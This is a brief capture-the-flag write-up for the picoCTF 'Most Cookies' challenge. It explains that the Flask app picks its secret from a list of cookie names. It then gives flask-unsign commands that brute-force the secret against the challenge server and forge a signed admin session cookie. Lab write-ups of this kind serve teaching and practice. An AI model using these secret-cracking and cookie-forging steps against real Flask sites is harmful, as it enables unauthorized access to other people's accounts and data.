Skip to content

Most Cookies

Observing the source key, we find that:

  • There's a list of cookie names, from which one is chosen as app secret.
  • /searching stores the name as session cookie "very_auth:name", which if present in the above list redirects to /display
  • To get the flag we need to have cookie as "very_auth:admin", but this is not in the cookie name list, so the redirection doesn't happen

Try to get the secret key using flask-unsign:

flask-unsign --unsign --server 'http://mercury.picoctf.net:44693/' --wordlist cookie_list.txt

Create a signed cookie:

flask-unsign --sign --cookie "{'very_auth':'admin'}" --secret '<secret>'

Now, go to /display, edit the session cookie and reload